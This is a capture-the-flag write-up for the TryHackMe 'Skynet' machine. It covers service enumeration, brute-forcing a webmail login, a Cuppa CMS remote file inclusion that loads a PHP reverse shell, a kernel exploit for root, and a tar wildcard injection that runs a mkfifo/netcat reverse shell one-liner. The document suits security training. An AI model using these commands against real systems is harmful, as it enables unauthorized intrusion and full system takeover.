SkyNet
A vulnerable Terminator themed Linux machine. Are you able to compromise this Terminator themed machine?
Linux CVE RFI linPEASRoom Description
A vulnerable Terminator themed Linux machine. Are you able to compromise this Terminator themed machine? Find THM room here
Used Commands
nmap -sV -sC -oN nmap.out -vv <target ip>
gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
/usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt
smbclient //<target ip>/anonymous -U
python -m http.server <webserver port>
wget http://<webserver ip>:<webserver port>/<file name>
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh
Enumeration
The task description does not give too much information. Using Nmap and gobuster is a good way to start with. The next two steps show how the way I enumerated the target with Nmap and gobuster. The third step will be a summary of what information was found.
Nmap
Run: nmap -sV -sC -oN nmap.out -vv <target ip>
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-24 20:54 UTC
NSE: Loaded 151 scripts for scanning.
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
| 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE RESP-CODES SASL PIPELINING TOP CAPA
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: Pre-login more LITERAL+ have LOGINDISABLEDA0001 ID IDLE post-login SASL-IR listed ENABLE OK IMAP4rev1 LOGIN-REFERRALS capabilities
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:9D:B2:03:AA:DD (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Continue with the next step in another shell.
Gobuster
Start gobuster and let it work in parallel. I expected a different result when running the following command without a specified port, but this was not the case.
Run gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.61.56:80
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/24 21:08:15 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/24 21:08:32 Finished
===============================================================
What’s in the reports?
Nmap and Gobuster show a couple of open ports and available directories. Read the reports carefully. You should be able to extract similar information as follow. I’ve listed them below:
Service | Port |
---|---|
Apache 2.4.18 Webserver | 80 |
SMB | 139/445 |
SSH | 22 |
Dovecot Mailserver | 110/143 |
Directories | Result |
---|---|
/admin | Forbidden |
/config | Forbidden |
/squirrelmail | Login |
/ai | Forbidden |
Further, have a look at the source code of the website. Sometimes you can spot some useful information.
Website
Open your browser and navigate to http://<target ip>
![Screenshot of the website behind the webserver](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_welcome.png)
I played around a little but there seems not much to be. Then I used searchsploit in the hope to find some vulnerabilities for Apache 2.4.18 but couldn’t find something that helps to get a foot in the door. At this point, I thought about going for that login screen /squirrelmail
but the information is rare so I decided to go for SMB.
Let’s go!
SMB
Use enum4linux to collect info about shares. Use the path to your enum4linx.pl script run it.
For me it’s /usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt
==========================
| Target Information |
==========================
Target ........... 10.10.61.56
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
====================================
| Session Check on 10.10.61.56 |
====================================
[+] Server 10.10.61.56 allows sessions using username '', password ''
...
============================
| Users on 10.10.61.56 |
============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
...
========================================
| Share Enumeration on 10.10.61.56 |
========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.61.56
//10.10.61.56/print$ Mapping: DENIED, Listing: N/A
//10.10.61.56/anonymous Mapping: OK, Listing: OK
//10.10.61.56/milesdyson Mapping: DENIED, Listing: N/A
//10.10.61.56/IPC$ [E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing
======================================================================
| Users on 10.10.61.56 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-500 *unknown*\*unknown* (8)
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)
...
Check the log and find some useful info for us.
Fact | Description |
---|---|
Anonymous Login | Yes |
Users | SKYNET\milesdyson (Local User) |
Shares | anonymous , milesdyson |
Let’s try to connect and see what we get!
Share of interest is anonymous
user is ''
and password is ''
Run smbclient //<target ip>/anonymous -U
and confirm two times.
root@kali:~/Desktop# smbclient //10.10.61.56/anonymous -U
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 07:20:17 2019
attention.txt N 163 Wed Sep 18 03:04:59 2019
logs D 0 Wed Sep 18 04:42:16 2019
9204224 blocks of size 1024. 5788828 blocks available
Get both attention.txt
and the log files in logs
.
A recent system malfunction has caused various passwords to be changed.
All skynet employees are required to change their password after seeing this.
-Miles Dyson
log1.txt
seems to contain some passwords.
User is milesdyson
password is taken from the list.
First I used Hydra and tried to brute-force SMB without success. So I choose to switch over to /squirrelmail
.
SquirrelMail
![Login screen showing SquirrelMail](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_squirrelmail.png)
I used BurpSuite for brute-forcing the password. If you are not familiar with Burp Suite check out this introductory room on THM BurpSuite created by DarkStar7471.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_brute_force_squirrel.png)
Load the password list and start the attack. You will receive a list of responses where you need to pick the outstanding one (look at the response code). Use the credentials and try to log in.
That’s also the password the current task is asking for.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_squirrelmail.png)
Read through the mails and find the following info:
Information | |
---|---|
1 | Password for SMB |
2 | Binary string |
3 | some strange text |
The first mail shows a new password that we will give a try!
The second mail contains some binary code.
The third mail contains some more crazy text.
Use the password in the first mail to log in using smbclient like above.
Run smbclient //<target ip>/milesdyson -U milesdyson
Enter WORKGROUP\milesdysons password: <password from email>
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5831472 blocks available
smb: \>
What’s the hidden directory?
Check out the notes
directory and find important.txt
. This file contains a hidden folder.
1. Add features to beta CMS /****************
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_personal_page.png)
There is nothing really useful on this site. Seems to be a dead end. Let’s go through what we have found so far.
Quick Summary
There is SSH, SMB, an Apache Webserver, and a Dovecot MailServer.
We successfully logged into SMB share anonymous and found a text file that told us that there was a malfunction causing passwords to be changed.
One of the log files contained a list of passwords that we used to brute-force into SquirrelMail.
We again found a password in one of the mails and successfully logged into SMB share of milesdyson
. From there we found another hidden directory
.
Let’s move on and enumerate the hidden directory.
For me, that part was a bit tricky because digging deeper was not my first thought about how to continue. Instead, I was lurking for any options regarding SSH but then found out there wasn’t enough information to do so. Finally, I stuck at this point and had to read another write-up to get my feet on the ground. The solution is quite simple: Start over and collect more info from a different base.
Digging deeper
Navigate to that directory using your browser. There is an image of milesdyson some text about him. The source code does not give any more information. The only option seems to be to dig deeper.
Run gobuster dir -u http://<target ip>/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 250
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_gobuster_hidden.png)
There is another directory /administrator
. Navigate there and find a CMS (something we already read about in the notes).
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_cuppa.png)
Great! We don’t have credentials to log in but what about using searchsploit?. Maybe there are some known exploits on this CMS.
searchsploit cuppa
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_searchsploit_cuppa.png)
You can also checkout corresponding CVE on exploit-db and read the description there.
That’s another question that you can answer now.
What's the vulnerability called when you can include a remote file for malicious purposes?
2/3 of the answer is in the title of the exploit you downloaded. Use google and search for the first word. You’ll quickly find it on your own.
Gain initial Reverse Shell
It’s recommended to read the exploit description in every detail to understand the following.
Download php-reverse-shell.php from github and change the IP and port.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_reverse_shell_php.png)
- Setup a webserver
python3 -m http.server 8888
. - Set up a Netcat listener
nc -lvnp 4444
.
Use the same port that you included inphp-reverse-shell.php
. - Append
alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php
on the URL of the login pagehttp://<target ip>/45kra24zxs28v3yd/administrator/
.
The URL should look like this:
http://<target ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php
Copy that URL to your browser and hit enter.
Extend Shell to root
Read different write-ups and you will see different approaches. A good way to start with is e.g. sudo -l
or crontabs
. Try both ways on your own.
Solution 1: Linux Kernel
On the attack machine:
- Check Linux version: 4.8
- Use
searchsploit Linux 4.8
to search for any vulnerabilities - There is one record with a version matching the OS version above
- Copy this exploit using
searchsploit -m 43418.c
to your local folder - Start a webserver
python -m http.server 8888
(where you copied the exploit to)
On the target machine:
- Change directory
cd /var/www/html
as userwww-data
can write there. - Download the file to the target via http.server
wget http://<webserver ip>:8888/43418.c
$ wget http://10.10.48.92:8000/43418.c
--2021-04-29 11:42:36-- http://10.10.48.92:8000/43418.c
Connecting to 10.10.48.92:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24033 (23K) [text/plain]
Saving to: '43418.c'
0K .......... .......... ... 100% 65.5M=0s
2021-04-29 11:42:36 (65.5 MB/s) - '43418.c' saved [24033/24033]
- Compile that file:
gcc 43418.c -o privesc
- and run
./privesc
$ gcc 43418.c -o privesc
$ ./privesc
^[[3~bash: cannot set terminal process group (1290): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# whoami
whoami
root
root@skynet:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
Solution 2: Wildcards
This way is quite interesting! For further reading search for exploit tar wildcard for privilege escalation
on google.
The principle behind this approach is to trick tar to execute files as different users (e.g. as root).
In the following case multiple files are created:
- a file that tells tar to stop at a specific
checkpoint
- another file that tells tar what to do at this specific
checkpoint
- and finally the file that should be executed
shell.sh
cd /var/www/html
touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh
Start a Netcat listener on the attacker machine with nc -lvnp <port>
and wait until the next cronjob is finished.
![](https://www.xuptox.org/docs/tryhackme/skynet/thm_skynet_root_wildcards.png)
Congrats! You are root! Now locate the root flag and finish that room.